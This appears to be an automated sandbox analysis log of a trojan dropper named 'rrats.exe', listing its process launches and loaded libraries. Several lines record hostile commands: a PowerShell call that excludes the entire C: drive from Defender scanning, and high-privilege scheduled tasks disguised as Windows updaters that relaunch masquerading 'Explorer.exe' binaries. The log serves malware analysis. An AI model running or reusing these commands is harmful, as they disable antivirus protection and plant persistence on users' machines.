                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Explorer.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Explorer.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Explorer.exeJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeCommand line argument: sfxname0_2_00CBDF1E
                        Source: C:\Users\user\Desktop\rrats.exeCommand line argument: sfxstime0_2_00CBDF1E
                        Source: C:\Users\user\Desktop\rrats.exeCommand line argument: STARTDLG0_2_00CBDF1E
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: B*4_2_00E92EF8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: sfxname4_2_00E92EF8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: sfxstime4_2_00E92EF8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: X+4_2_00E92EF8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: STARTDLG4_2_00E92EF8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: D+4_2_00E92EF8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCommand line argument: ~j4_2_00EA69D0
                        Source: rrats.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\rrats.exeFile read: C:\Windows\win.iniJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: rrats.exeReversingLabs: Detection: 44%
                        Source: C:\Users\user\Desktop\rrats.exeFile read: C:\Users\user\Desktop\rrats.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\rrats.exe "C:\Users\user\Desktop\rrats.exe"
                        Source: C:\Users\user\Desktop\rrats.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe a.exe -p1234
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe"
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Explorer.exe C:\Users\user\AppData\Roaming\Explorer.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Explorer.exe "C:\Users\user\AppData\Roaming\Explorer.exe"
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\explore.exe C:\Users\user\AppData\Local\explore.exe
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\Desktop\rrats.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe a.exe -p1234Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exitJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Explorer.exe "C:\Users\user\AppData\Roaming\Explorer.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
